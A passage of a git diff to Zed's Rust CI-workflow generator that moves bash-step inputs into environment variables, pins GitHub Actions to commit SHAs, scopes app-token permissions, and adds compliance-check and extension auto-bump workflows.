{channel}")) + named::bash(r#"./script/cherry-pick "$BRANCH" "$COMMIT" "$CHANNEL""#) + .add_env(("BRANCH", branch.to_string())) + .add_env(("COMMIT", commit.to_string())) + .add_env(("CHANNEL", channel.to_string())) .add_env(("GIT_COMMITTER_NAME", "Zed Zippy")) .add_env(("GIT_COMMITTER_EMAIL", "hi@zed.dev")) .add_env(("GITHUB_TOKEN", token)) } - let (authenticate, token) = steps::authenticate_as_zippy(); + let (authenticate, token) = steps::authenticate_as_zippy() + .for_repository(RepositoryTarget::current()) + .with_permissions([ + (TokenPermissions::Contents, Level::Write), + (TokenPermissions::Workflows, Level::Write), + (TokenPermissions::PullRequests, Level::Write), + ]) + .into(); named::job( Job::default() diff --git a/tooling/xtask/src/tasks/workflows/compare_perf.rs b/tooling/xtask/src/tasks/workflows/compare_perf.rs index 1d111acc4f8a4dc47edea6f45c0b93c845b7cda2..39f17b8d148bd6022913fdf5097368690cbd0fd0 100644 --- a/tooling/xtask/src/tasks/workflows/compare_perf.rs +++ b/tooling/xtask/src/tasks/workflows/compare_perf.rs @@ -29,24 +29,30 @@ pub fn run_perf( crate_name: &WorkflowInput, ) -> NamedJob { fn cargo_perf_test(ref_name: &WorkflowInput, crate_name: &WorkflowInput) -> Step { - named::bash(&format!( - " - if [ -n \"{crate_name}\" ]; then - cargo perf-test -p {crate_name} -- --json={ref_name}; + named::bash( + r#" + if [ -n "$CRATE_NAME" ]; then + cargo perf-test -p "$CRATE_NAME" -- --json="$REF_NAME"; else - cargo perf-test -p vim -- --json={ref_name}; - fi" - )) + cargo perf-test -p vim -- --json="$REF_NAME"; + fi"#, + ) + .add_env(("REF_NAME", ref_name.to_string())) + .add_env(("CRATE_NAME", crate_name.to_string())) } fn install_hyperfine() -> Step { - named::uses("taiki-e", "install-action", "hyperfine") + named::uses( + "taiki-e", + "install-action", + "b4f2d5cb8597b15997c8ede873eb6185efc5f0ad", // hyperfine + ) } fn compare_runs(head: &WorkflowInput, base: &WorkflowInput) -> Step { - named::bash(&format!( - "cargo perf-compare --save=results.md {base} {head}" - )) + named::bash(r#"cargo perf-compare --save=results.md "$BASE" "$HEAD""#) + .add_env(("BASE", base.to_string())) + .add_env(("HEAD", head.to_string())) } named::job( diff --git a/tooling/xtask/src/tasks/workflows/compliance_check.rs b/tooling/xtask/src/tasks/workflows/compliance_check.rs new file mode 100644 index 0000000000000000000000000000000000000000..9e2f4ae1e588c545266ec5a8246ac9781c6b668b --- /dev/null +++ b/tooling/xtask/src/tasks/workflows/compliance_check.rs @@ -0,0 +1,66 @@ +use gh_workflow::{Event, Expression, Job, Run, Schedule, Step, Workflow}; + +use crate::tasks::workflows::{ + runners, + steps::{self, CommonJobConditions, named}, + vars::{self, StepOutput}, +}; + +pub fn compliance_check() -> Workflow { + let check = scheduled_compliance_check(); + + named::workflow() + .on(Event::default().schedule([Schedule::new("30 17 * * 2")])) + .add_env(("CARGO_TERM_COLOR", "always")) + .add_job(check.name, check.job) +} + +fn scheduled_compliance_check() -> steps::NamedJob { + let determine_version_step = named::bash(indoc::indoc! {r#" + VERSION=$(sed -n 's/^version = "\(.*\)"/\1/p' crates/zed/Cargo.toml | tr -d '[:space:]') + if [ -z "$VERSION" ]; then + echo "Could not determine version from crates/zed/Cargo.toml" + exit 1 + fi + TAG="v${VERSION}-pre" + echo "Checking compliance for $TAG" + echo "tag=$TAG" >> "$GITHUB_OUTPUT" + "#}) + .id("determine-version"); + + let tag_output = StepOutput::new(&determine_version_step, "tag"); + + fn run_compliance_check(tag: &StepOutput) -> Step { + named::bash( + r#"cargo xtask compliance "$LATEST_TAG" --branch main --report-path target/compliance-report"#, + ) + .id("run-compliance-check") + .add_env(("LATEST_TAG", tag.to_string())) + .add_env(("GITHUB_APP_ID", vars::ZED_ZIPPY_APP_ID)) + .add_env(("GITHUB_APP_KEY", vars::ZED_ZIPPY_APP_PRIVATE_KEY)) + } + + fn send_failure_slack_notification(tag: &StepOutput) -> Step { + named::bash(indoc::indoc! {r#" + MESSAGE="⚠️ Scheduled compliance check failed for upcoming preview release $LATEST_TAG: There are PRs with missing reviews." + + curl -X POST -H 'Content-type: application/json' \ + --data "$(jq -n --arg text "$MESSAGE" '{"text": $text}')" \ + "$SLACK_WEBHOOK" + "#}) + .if_condition(Expression::new("failure()")) + .add_env(("SLACK_WEBHOOK", vars::SLACK_WEBHOOK_WORKFLOW_FAILURES)) + .add_env(("LATEST_TAG", tag.to_string())) + } + + named::job( + Job::default() + .with_repository_owner_guard() + .runs_on(runners::LINUX_SMALL) + .add_step(steps::checkout_repo().with_full_history()) + .add_step(steps::cache_rust_dependencies_namespace()) + .add_step(determine_version_step) + .add_step(run_compliance_check(&tag_output)) + .add_step(send_failure_slack_notification(&tag_output)), + ) +} diff --git a/tooling/xtask/src/tasks/workflows/deploy_collab.rs b/tooling/xtask/src/tasks/workflows/deploy_collab.rs index 58212118c7ba4fa6d44d5f29fac671ca6eb5e662..c6b620bd5d54c18ddad3796b414e1ba04c90f530 100644 --- a/tooling/xtask/src/tasks/workflows/deploy_collab.rs +++ b/tooling/xtask/src/tasks/workflows/deploy_collab.rs @@ -1,9 +1,9 @@ use gh_workflow::{Container, Event, Port, Push, Run, Step, Use, Workflow}; -use indoc::{formatdoc, indoc}; +use indoc::indoc; use crate::tasks::workflows::runners::{self, Platform}; use crate::tasks::workflows::steps::{ - self, CommonJobConditions, FluentBuilder as _, NamedJob, dependant_job, named, + self, CommonJobConditions, FluentBuilder as _, NamedJob, dependant_job, named, use_clang, }; use crate::tasks::workflows::vars; @@ -23,7 +23,7 @@ pub(crate) fn deploy_collab() -> Workflow { } fn style() -> NamedJob { - named::job( + named::job(use_clang( dependant_job(&[]) .name("Check formatting and Clippy lints") .with_repository_owner_guard() @@ -33,8 +33,8 @@ fn style() -> NamedJob { .add_step(steps::cache_rust_dependencies_namespace()) .map(steps::install_linux_dependencies) .add_step(steps::cargo_fmt()) - .add_step(steps::clippy(Platform::Linux)), - ) + .add_step(steps::clippy(Platform::Linux, None)), + )) } fn tests(deps: &[&NamedJob]) -> NamedJob { @@ -42,7 +42,7 @@ fn tests(deps: &[&NamedJob]) -> NamedJob { named::bash("cargo nextest run --package collab --no-fail-fast") } - named::job( + named::job(use_clang( dependant_job(deps) .name("Run tests") .runs_on(runners::LINUX_XL) @@ -65,7 +65,7 @@ fn tests(deps: &[&NamedJob]) -> NamedJob { .add_step(steps::cargo_install_nextest()) .add_step(steps::clear_target_dir_if_large(Platform::Linux)) .add_step(run_collab_tests()), - ) + )) } fn publish(deps: &[&NamedJob]) -> NamedJob { @@ -115,9 +115,10 @@ fn deploy(deps: &[&NamedJob]) -> NamedJob { } fn sign_into_kubernetes() -> Step { - named::bash(formatdoc! {r#" - doctl kubernetes cluster kubeconfig save --expiry-seconds 600 {cluster_name} - "#, cluster_name = vars::CLUSTER_NAME}) + named::bash( + r#"doctl kubernetes cluster kubeconfig save --expiry-seconds 600 "$CLUSTER_NAME""#, + ) + .add_env(("CLUSTER_NAME", vars::CLUSTER_NAME)) } fn start_rollout() -> Step { @@ -139,7 +140,7 @@ fn deploy(deps: &[&NamedJob]) -> NamedJob { echo "Deploying collab:$GITHUB_SHA to $ZED_KUBE_NAMESPACE" source script/lib/deploy-helpers.sh - export_vars_for_environment $ZED_KUBE_NAMESPACE + export_vars_for_environment "$ZED_KUBE_NAMESPACE" ZED_DO_CERTIFICATE_ID="$(doctl compute certificate list --format ID --no-header)" export ZED_DO_CERTIFICATE_ID @@ -149,14 +150,14 @@ fn deploy(deps: &[&NamedJob]) -> NamedJob { export ZED_LOAD_BALANCER_SIZE_UNIT=$ZED_COLLAB_LOAD_BALANCER_SIZE_UNIT export DATABASE_MAX_CONNECTIONS=850 envsubst < crates/collab/k8s/collab.template.yml | kubectl apply -f - - kubectl -n "$ZED_KUBE_NAMESPACE" rollout status deployment/$ZED_SERVICE_NAME --watch + kubectl -n "$ZED_KUBE_NAMESPACE" rollout status "deployment/$ZED_SERVICE_NAME" --watch echo "deployed ${ZED_SERVICE_NAME} to ${ZED_KUBE_NAMESPACE}" export ZED_SERVICE_NAME=api export ZED_LOAD_BALANCER_SIZE_UNIT=$ZED_API_LOAD_BALANCER_SIZE_UNIT export DATABASE_MAX_CONNECTIONS=60 envsubst < crates/collab/k8s/collab.template.yml | kubectl apply -f - - kubectl -n "$ZED_KUBE_NAMESPACE" rollout status deployment/$ZED_SERVICE_NAME --watch + kubectl -n "$ZED_KUBE_NAMESPACE" rollout status "deployment/$ZED_SERVICE_NAME" --watch echo "deployed ${ZED_SERVICE_NAME} to ${ZED_KUBE_NAMESPACE}" "#}) } diff --git a/tooling/xtask/src/tasks/workflows/extension_auto_bump.rs b/tooling/xtask/src/tasks/workflows/extension_auto_bump.rs new file mode 100644 index 0000000000000000000000000000000000000000..e69c783299aa18c3d97f78b4fb12355bd0215450 --- /dev/null +++ b/tooling/xtask/src/tasks/workflows/extension_auto_bump.rs @@ -0,0 +1,113 @@ +use gh_workflow::{ + Event, Expression, Input, Job, Level, Permissions, Push, Strategy, UsesJob, Workflow, +}; +use indoc::indoc; +use serde_json::json; + +use crate::tasks::workflows::{ + extensions::WithAppSecrets, + run_tests::DETECT_CHANGED_EXTENSIONS_SCRIPT, + runners, + steps::{self, CommonJobConditions, NamedJob, named}, + vars::{StepOutput, one_workflow_per_non_main_branch}, +}; + +/// Generates a workflow that triggers on push to main, detects changed extensions +/// in the `extensions/` directory, and invokes the `extension_bump` reusable workflow +/// for each changed extension via a matrix strategy. +pub(crate) fn extension_auto_bump() -> Workflow { + let detect = detect_changed_extensions(); + let bump = bump_extension_versions(&detect); + + named::workflow() + .add_event( + Event::default().push( + Push::default() + .add_branch("main") + .add_path("extensions/**") + .add_path("!extensions/test-extension/**") + .add_path("!extensions/workflows/**") + .add_path("!extensions/*.md"), + ), + ) + .concurrency(one_workflow_per_non_main_branch()) + .add_job(detect.name, detect.job) + .add_job(bump.name, bump.job) +} + +fn detect_changed_extensions() -> NamedJob { + let preamble = indoc! {r#" + COMPARE_REV="$(git rev-parse HEAD~1)" + CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")" + "#}; + + let filter_newly_added = indoc! {r#" + # Filter out newly added extensions + FILTERED="[]" + for ext in $(echo "$EXTENSIONS_JSON" | jq -r '.[]'); do + if git show HEAD~1:"$ext/extension.toml" >/dev/null 2>&1; then + FILTERED=$(echo "$FILTERED" | jq -c --arg e "$ext" '. + [$e]') + fi + done + echo "changed_extensions=$FILTERED" >> "$GITHUB_OUTPUT" + "#}; + + let script = format!( + "{preamble}{detect}{filter}", + preamble = preamble, + detect = DETECT_CHANGED_EXTENSIONS_SCRIPT, + filter = filter_newly_added, + ); + + let step = named::bash(script).id("detect"); + + let output = StepOutput::new(&step, "changed_extensions"); + + let job = Job::default() + .with_repository_owner_guard() + .runs_on(runners::LINUX_SMALL) + .timeout_minutes(5u32) + .add_step(steps::checkout_repo().with_custom_fetch_depth(2)) + .add_step(step) + .outputs([("changed_extensions".to_owned(), output.to_string())]); + + named::job(job) +} + +fn bump_extension_versions(detect_job: &NamedJob) -> NamedJob { + let job = Job::default() + .needs(vec![detect_job.name.clone()]) + .cond(Expression::new(format!( + "needs.{}.outputs.changed_extensions != '[]'", + detect_job.name + ))) + .permissions( + Permissions::default() + .contents(Level::Write) + .issues(Level::Write) + .pull_requests(Level::Write) + .actions(Level::Write), + ) + .strategy( + Strategy::default() + .fail_fast(false) + // TODO: Remove the limit. We currently need this to workaround the concurrency group issue + // where different matrix jobs would be placed in the same concurrency group and thus cancelled. + .max_parallel(1u32) + .matrix(json!({ + "extension": format!( + "${{{{ fromJson(needs.{}.outputs.changed_extensions) }}}}", + detect_job.name + ) + })), + ) + .uses_local(".github/workflows/extension_bump.yml") + .with( + Input::default() + .add("working-directory", "${{ matrix.extension }}") + .add("force-bump", false), + ) + .with_app_secrets(); + + named::job(job) +} diff --git a/tooling/xtask/src/tasks/workflows/extension_bump.rs b/tooling/xtask/src/tasks/workflows/extension_bump.rs index 746b842f18dfcc8805be9285facefdfa52085b84..77d2acf7c830302407207950b1919b9002049460 100644 --- a/tooling/xtask/src/tasks/workflows/extension_bump.rs +++ b/tooling/xtask/src/tasks/workflows/extension_bump.rs @@ -5,11 +5,13 @@ use crate::tasks::workflows::{ extension_tests::{self}, runners, steps::{ - self, CommonJobConditions, DEFAULT_REPOSITORY_OWNER_GUARD, FluentBuilder, NamedJob, - checkout_repo, dependant_job, named, + self, BASH_SHELL, CommonJobConditions, DEFAULT_REPOSITORY_OWNER_GUARD, NamedJob, + RepositoryTarget, cache_rust_dependencies_namespace, checkout_repo, dependant_job, + generate_token, named, }, vars::{ - JobOutput, StepOutput, WorkflowInput, WorkflowSecret, one_workflow_per_non_main_branch, + JobOutput, StepOutput, WorkflowInput, WorkflowSecret, + one_workflow_per_non_main_branch_and_token, }, }; @@ -22,6 +24,7 @@ pub(crate) fn extension_bump() -> Workflow { // TODO: Ideally, this would have a default of `false`, but this is currently not // supported in gh-workflows let force_bump = WorkflowInput::bool("force-bump", None); + let working_directory = WorkflowInput::string("working-directory", Some(".".to_owned())); let (app_id, app_secret) = extension_workflow_secrets(); let (check_version_changed, version_changed, current_version) = check_version_changed(); @@ -39,16 +42,17 @@ pub(crate) fn extension_bump() -> Workflow { &app_id, &app_secret, ); - let create_label = create_version_label( + let (create_label, tag) = create_version_label( &dependencies, &version_changed, ¤t_version, &app_id, &app_secret, ); + let tag = tag.as_job_output(&create_label); let trigger_release = trigger_release( &[&check_version_changed, &create_label], - current_version, + tag, &app_id, &app_secret, ); @@ -59,6 +63,7 @@ pub(crate) fn extension_bump() -> Workflow { WorkflowCall::default() .add_input(bump_type.name, bump_type.call_input()) .add_input(force_bump.name, force_bump.call_input()) + .add_input(working_directory.name, working_directory.call_input()) .secrets([ (app_id.name.to_owned(), app_id.secret_configuration()), ( @@ -68,7 +73,7 @@ pub(crate) fn extension_bump() -> Workflow { ]), ), ) - .concurrency(one_workflow_per_non_main_branch()) + .concurrency(one_workflow_per_non_main_branch_and_token("extension-bump")) .add_env(("CARGO_TERM_COLOR", "always")) .add_env(("RUST_BACKTRACE", 1)) .add_env(("CARGO_INCREMENTAL", 0)) @@ -82,10 +87,19 @@ pub(crate) fn extension_bump() -> Workflow { .add_job(trigger_release.name, trigger_release.job) } +fn extension_job_defaults() -> Defaults { + Defaults::default().run( + RunDefaults::default() + .shell(BASH_SHELL) + .working_directory("${{ inputs.working-directory }}"), + ) +} + fn check_version_changed() -> (NamedJob, StepOutput, StepOutput) { let (compare_versions, version_changed, current_version) = compare_versions(); let job = Job::default() + .defaults(extension_job_defaults()) .with_repository_owner_guard() .outputs([ (version_changed.name.to_owned(), version_changed.to_string()), @@ -108,26 +122,35 @@ fn create_version_label( current_version: &JobOutput, app_id: &WorkflowSecret, app_secret: &WorkflowSecret, -) -> NamedJob { +) -> (NamedJob, StepOutput) { let (generate_token, generated_token) = - generate_token(&app_id.to_string(), &app_secret.to_string(), None); + generate_token(&app_id.to_string(), &app_secret.to_string()).into(); + let (determine_tag_step, tag) = determine_tag(current_version); let job = steps::dependant_job(dependencies) + .defaults(extension_job_defaults()) .cond(Expression::new(format!( "{DEFAULT_REPOSITORY_OWNER_GUARD} && github.event_name == 'push' && \ github.ref == 'refs/heads/main' && {version_changed} == 'true'", version_changed = version_changed_output.expr(), ))) + .outputs([(tag.name.to_owned(), tag.to_string())]) .runs_on(runners::LINUX_SMALL) .timeout_minutes(1u32) .add_step(generate_token) .add_step(steps::checkout_repo()) - .add_step(create_version_tag(current_version, generated_token)); + .add_step(determine_tag_step) + .add_step(create_version_tag(&tag, generated_token)); - named::job(job) + (named::job(job), tag) } -fn create_version_tag(current_version: &JobOutput, generated_token: StepOutput) -> Step { - named::uses("actions", "github-script", "v7").with( +fn create_version_tag(tag: &StepOutput, generated_token: StepOutput) -> Step { + named::uses( + "actions", + "github-script", + "f28e40c7f34bde8b3046d885e986cb6290c5673b", // v7 + ) + .with( Input::default() .add( "script", @@ -135,7 +158,7 @@ fn create_version_tag(current_version: &JobOutput, generated_token: StepOutput) github.rest.git.createRef({{ owner: context.repo.owner, repo: context.repo.repo, - ref: 'refs/tags/v{current_version}', + ref: 'refs/tags/{tag}', sha: context.sha }})"# }, @@ -144,17 +167,35 @@ fn create_version_tag(current_version: &JobOutput, generated_token: StepOutput) ) } +fn determine_tag(current_version: &JobOutput) -> (Step, StepOutput) { + let step = named::bash(formatdoc! {r#" + EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + + if [[ "$WORKING_DIR" == "." || -z "$WORKING_DIR" ]]; then + TAG="v${{CURRENT_VERSION}}" + else + TAG="${{EXTENSION_ID}}-v${{CURRENT_VERSION}}" + fi + + echo "tag=${{TAG}}" >> "$GITHUB_OUTPUT" + "#}) + .id("determine-tag") + .add_env(("CURRENT_VERSION", current_version.to_string())) + .add_env(("WORKING_DIR", "${{ inputs.working-directory }}")); + + let tag = StepOutput::new(&step, "tag"); + (step, tag) +} + /// Compares the current and previous commit and checks whether versions changed inbetween. pub(crate) fn compare_versions() -> (Step, StepOutput, StepOutput) { let check_needs_bump = named::bash(formatdoc! { r#" CURRENT_VERSION="$({VERSION_CHECK})" - if [[ "${{{{ github.event_name }}}}" == "pull_request" ]]; then + if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then PR_FORK_POINT="$(git merge-base origin/main HEAD)" git checkout "$PR_FORK_POINT" - elif BRANCH_PARENT_SHA="$(git merge-base origin/main origin/zed-zippy-autobump)"; then - git checkout "$BRANCH_PARENT_SHA" else git checkout "$(git log -1 --format=%H)"~1 fi @@ -186,69 +227,34 @@ fn bump_extension_version( app_secret: &WorkflowSecret, ) -> NamedJob { let (generate_token, generated_token) = - generate_token(&app_id.to_string(), &app_secret.to_string(), None); - let (bump_version, new_version) = bump_version(current_version, bump_type); + generate_token(&app_id.to_string(), &app_secret.to_string()).into(); + let (bump_version, _new_version, title, body, branch_name) = + bump_version(current_version, bump_type); let job = steps::dependant_job(dependencies) + .defaults(extension_job_defaults()) .cond(Expression::new(format!( "{DEFAULT_REPOSITORY_OWNER_GUARD} &&\n({force_bump} == true || {version_changed} == 'false')", force_bump = force_bump_output.expr(), version_changed = version_changed_output.expr(), ))) .runs_on(runners::LINUX_SMALL) - .timeout_minutes(3u32) + .timeout_minutes(5u32) .add_step(generate_token) .add_step(steps::checkout_repo()) + .add_step(cache_rust_dependencies_namespace()) .add_step(install_bump_2_version()) .add_step(bump_version) - .add_step(create_pull_request(new_version, generated_token)); + .add_step(create_pull_request( + title, + body, + generated_token, + branch_name, + )); named::job(job) } -pub(crate) fn generate_token( - app_id_source: &str, - app_secret_source: &str, - repository_target: Option, -) -> (Step, StepOutput) { - let step = named::uses("actions", "create-github-app-token", "v2") - .id("generate-token") - .add_with( - Input::default() - .add("app-id", app_id_source) - .add("private-key", app_secret_source) - .when_some( - repository_target, - |input, - RepositoryTarget { - owner, - repositories, - permissions, - }| { - input - .when_some(owner, |input, owner| input.add("owner", owner)) - .when_some(repositories, |input, repositories| { - input.add("repositories", repositories) - }) - .when_some(permissions, |input, permissions| { - permissions - .into_iter() - .fold(input, |input, (permission, level)| { - input.add( - permission, - serde_json::to_value(&level).unwrap_or_default(), - ) - }) - }) - }, - ), - ); - - let generated_token = StepOutput::new(&step, "token"); - - (step, generated_token) -} - fn install_bump_2_version() -> Step { named::run( runners::Platform::Linux, @@ -256,10 +262,11 @@ fn install_bump_2_version() -> Step { ) } -fn bump_version(current_version: &JobOutput, bump_type: &WorkflowInput) -> (Step, StepOutput) { +fn bump_version( + current_version: &JobOutput, + bump_type: &WorkflowInput, +) -> (Step, StepOutput, StepOutput, StepOutput, StepOutput) { let step = named::bash(formatdoc! {r#" - OLD_VERSION="{current_version}" - BUMP_FILES=("extension.toml") if [[ -f "Cargo.toml" ]]; then BUMP_FILES+=("Cargo.toml") @@ -269,38 +276,68 @@ fn bump_version(current_version: &JobOutput, bump_type: &WorkflowInput) -> (Step --search "version = \"{{current_version}}"\" \ --replace "version = \"{{new_version}}"\" \ --current-version "$OLD_VERSION" \ - --no-configured-files {bump_type} "${{BUMP_FILES[@]}}" + --no-configured-files "$BUMP_TYPE" "${{BUMP_FILES[@]}}" if [[ -f "Cargo.toml" ]]; then - cargo update --workspace + cargo +stable update --workspace fi NEW_VERSION="$({VERSION_CHECK})" + EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + EXTENSION_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + + if [[ "$WORKING_DIR" == "." || -z "$WORKING_DIR" ]]; then + {{ + echo "title=Bump version to ${{NEW_VERSION}}"; + echo "body=This PR bumps the version of this extension to v${{NEW_VERSION}}"; + echo "branch_name=zed-zippy-autobump"; + }} >> "$GITHUB_OUTPUT" + else + {{ + echo "title=${{EXTENSION_ID}}: Bump to v${{NEW_VERSION}}"; + echo "body<> "$GITHUB_OUTPUT" + fi echo "new_version=${{NEW_VERSION}}" >> "$GITHUB_OUTPUT" "# }) - .id("bump-version"); + .id("bump-version") + .add_env(("OLD_VERSION", current_version.to_string())) + .add_env(("BUMP_TYPE", bump_type.to_string())) + .add_env(("WORKING_DIR", "${{ inputs.working-directory }}")); let new_version = StepOutput::new(&step, "new_version"); - (step, new_version) + let title = StepOutput::new(&step, "title"); + let body = StepOutput::new(&step, "body"); + let branch_name = StepOutput::new(&step, "branch_name"); + (step, new_version, title, body, branch_name) } -fn create_pull_request(new_version: StepOutput, generated_token: StepOutput) -> Step { - let formatted_version = format!("v{new_version}"); - - named::uses("peter-evans", "create-pull-request", "v7").with( +fn create_pull_request( + title: StepOutput, + body: StepOutput, + generated_token: StepOutput, + branch_name: StepOutput, +) -> Step { + named::uses( + "peter-evans", + "create-pull-request", + "98357b18bf14b5342f975ff684046ec3b2a07725", + ) + .with( Input::default() - .add("title", format!("Bump version to {new_version}")) - .add( - "body", - format!("This PR bumps the version of this extension to {formatted_version}",), - ) - .add( - "commit-message", - format!("Bump version to {formatted_version}"), - ) - .add("branch", "zed-zippy-autobump") + .add("title", title.to_string()) + .add("body", body.to_string()) + .add("commit-message", title.to_string()) + .add("branch", branch_name.to_string()) .add( "committer", "zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>", @@ -315,25 +352,30 @@ fn create_pull_request(new_version: StepOutput, generated_token: StepOutput) -> fn trigger_release( dependencies: &[&NamedJob], - version: JobOutput, + tag: JobOutput, app_id: &WorkflowSecret, app_secret: &WorkflowSecret, ) -> NamedJob { let extension_registry = RepositoryTarget::new("zed-industries", &["extensions"]); - let (generate_token, generated_token) = generate_token( - &app_id.to_string(), - &app_secret.to_string(), - Some(extension_registry), - ); + let (generate_token, generated_token) = + generate_token(&app_id.to_string(), &app_secret.to_string()) + .for_repository(extension_registry) + .into(); let (get_extension_id, extension_id) = get_extension_id(); + let (release_action, pull_request_number) = release_action(extension_id, tag, &generated_token); let job = dependant_job(dependencies) + .defaults(extension_job_defaults()) .with_repository_owner_guard() .runs_on(runners::LINUX_SMALL) .add_step(generate_token) .add_step(checkout_repo()) .add_step(get_extension_id) - .add_step(release_action(extension_id, version, generated_token)); + .add_step(release_action) + .add_step(enable_automerge_if_staff( + pull_request_number, + generated_token, + )); named::job(job) } @@ -354,14 +396,98 @@ fn get_extension_id() -> (Step, StepOutput) { fn release_action( extension_id: StepOutput, - version: JobOutput, + tag: JobOutput, + generated_token: &StepOutput, +) -> (Step, StepOutput) { + let step = named::uses( + "huacnlee", + "zed-extension-action", + "82920ff0876879f65ffbcfa3403589114a8919c6", + ) + .id("extension-update") + .add_with(("extension-name", extension_id.to_string())) + .add_with(("push-to", "zed-industries/extensions")) + .add_with(("tag", tag.to_string())) + .add_env(("COMMITTER_TOKEN", generated_token.to_string())); + + let pull_request_number = StepOutput::new(&step, "pull-request-number"); + + (step, pull_request_number) +} + +fn enable_automerge_if_staff( + pull_request_number: StepOutput, generated_token: StepOutput, ) -> Step { - named::uses("huacnlee", "zed-extension-action", "v2") - .add_with(("extension-name", extension_id.to_string())) - .add_with(("push-to", "zed-industries/extensions")) - .add_with(("tag", format!("v{version}"))) - .add_env(("COMMITTER_TOKEN", generated_token.to_string())) + named::uses( + "actions", + "github-script", + "f28e40c7f34bde8b3046d885e986cb6290c5673b", // v7 + ) + .add_with(("github-token", generated_token.to_string())) + .add_with(( + "script", + indoc! {r#" + const prNumber = process.env.PR_NUMBER; + if (!prNumber) { + console.log('No pull request number set, skipping automerge.'); + return; + } + + const author = process.env.GITHUB_ACTOR; + let isStaff = false; + try { + const response = await github.rest.teams.getMembershipForUserInOrg({ + org: 'zed-industries', + team_slug: 'staff', + username: author + }); + isStaff = response.data.state === 'active'; + } catch (error) { + if (error.status !== 404) { + throw error; + } + } + + if (!isStaff) { + console.log(`Actor ${author} is not a staff member, skipping automerge.`); + return; + } + + // Assign staff member responsible for the bump + const pullNumber = parseInt(prNumber); + + await github.rest.issues.addAssignees({ + owner: 'zed-industries', + repo: 'extensions', + issue_number: pullNumber, + assignees: [author] + }); + console.log(`Assigned ${author} to PR #${prNumber} in zed-industries/extensions`); + + // Get the GraphQL node ID + const { data: pr } = await github.rest.pulls.get({ + owner: 'zed-industries', + repo: 'extensions', + pull_number: pullNumber + }); + + await github.graphql(` + mutation($pullRequestId: ID!) { + enablePullRequestAutoMerge(input: { pullRequestId: $pullRequestId, mergeMethod: SQUASH }) { + pullRequest { + autoMergeRequest { + enabledAt + } + } + } + } + `, { pullRequestId: pr.node_id }); + + console.log(`Automerge enabled for PR #${prNumber} in zed-industries/extensions`); + "#}, + )) + .add_env(("PR_NUMBER", pull_request_number.to_string())) } fn extension_workflow_secrets() -> (WorkflowSecret, WorkflowSecret) { @@ -371,34 +497,3 @@ fn extension_workflow_secrets() -> (WorkflowSecret, WorkflowSecret) { (app_id, app_secret) } - -pub(crate) struct RepositoryTarget { - owner: Option, - repositories: Option, - permissions: Option>, -} - -impl RepositoryTarget { - pub fn new(owner: T, repositories: &[&str]) -> Self { - Self { - owner: Some(owner.to_string()), - repositories: Some(repositories.join("\n")), - permissions: None, - } - } - - pub fn current() -> Self { - Self { - owner: None, - repositories: None, - permissions: None, - } - } - - pub fn permissions(self, permissions: impl Into>) -> Self { - Self { - permissions: Some(permissions.into()), - ..self - } - } -} diff --git a/tooling/xtask/src/tasks/workflows/extension_tests.rs b/tooling/xtask/src/tasks/workflows/extension_tests.rs index a650013bacfcfc1ac89a60ccfe8674a5621fb1c7..d724afc1353b0aa9205706c5f23eb0d0ee8e96c9 100644 --- a/tooling/xtask/src/tasks/workflows/extension_tests.rs +++ b/tooling/xtask/src/tasks/workflows/extension_tests.rs @@ -1,18 +1,18 @@ use gh_workflow::*; -use indoc::{formatdoc, indoc}; +use indoc::indoc; use crate::tasks::workflows::{ extension_bump::compare_versions, - run_tests::{orchestrate_without_package_filter, tests_pass}, + run_tests::{fetch_ts_query_ls, orchestrate_for_extension, run_ts_query_ls, tests_pass}, runners, steps::{ - self, CommonJobConditions, FluentBuilder, NamedJob, cache_rust_dependencies_namespace, - named, + self, BASH_SHELL, CommonJobConditions, FluentBuilder, NamedJob, + cache_rust_dependencies_namespace, named, }, - vars::{PathCondition, StepOutput, one_workflow_per_non_main_branch}, + vars::{PathCondition, StepOutput, WorkflowInput, one_workflow_per_non_main_branch_and_token}, }; -pub(crate) const ZED_EXTENSION_CLI_SHA: &str = "03d8e9aee95ea6117d75a48bcac2e19241f6e667"; +pub(crate) const ZED_EXTENSION_CLI_SHA: &str = "1fa7f1a3ec28ea1eae6db2e937d7a538fb10c0c7"; // This should follow the set target in crates/extension/src/extension_builder.rs const EXTENSION_RUST_TARGET: &str = "wasm32-wasip2"; @@ -23,8 +23,10 @@ pub(crate) fn extension_tests() -> Workflow { let should_check_extension = PathCondition::new("check_extension", r"^(extension\.toml|.*\.scm)$"); - let orchestrate = - orchestrate_without_package_filter(&[&should_check_rust, &should_check_extension]); + let orchestrate = with_extension_defaults(orchestrate_for_extension(&[ + &should_check_rust, + &should_check_extension, + ])); let jobs = [ orchestrate, @@ -32,11 +34,20 @@ pub(crate) fn extension_tests() -> Workflow { should_check_extension.guard(check_extension()), ]; - let tests_pass = tests_pass(&jobs); + let tests_pass = tests_pass(&jobs, &[]); + + let working_directory = WorkflowInput::string("working-directory", Some(".".to_owned())); named::workflow() - .add_event(Event::default().workflow_call(WorkflowCall::default())) - .concurrency(one_workflow_per_non_main_branch()) + .add_event( + Event::default().workflow_call( + WorkflowCall::default() + .add_input(working_directory.name, working_directory.call_input()), + ), + ) + .concurrency(one_workflow_per_non_main_branch_and_token( + "extension-tests", + )) .add_env(("CARGO_TERM_COLOR", "always")) .add_env(("RUST_BACKTRACE", 1)) .add_env(("CARGO_INCREMENTAL", 0)) @@ -56,27 +67,66 @@ fn install_rust_target() -> Step { named::bash(format!("rustup target add {EXTENSION_RUST_TARGET}",)) } -fn run_clippy() -> Step { - named::bash("cargo clippy --release --all-features -- --deny warnings") +fn get_package_name() -> (Step, StepOutput) { + let step = named::bash(indoc! {r#" + PACKAGE_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < Cargo.toml | head -1 | tr -d '[:space:]')" + echo "package_name=${PACKAGE_NAME}" >> "$GITHUB_OUTPUT" + "#}) + .id("get-package-name"); + + let output = StepOutput::new(&step, "package_name"); + (step, output) +} + +fn cargo_fmt_package(package_name: &StepOutput) -> Step { + named::bash(r#"cargo fmt -p "$PACKAGE_NAME" -- --check"#) + 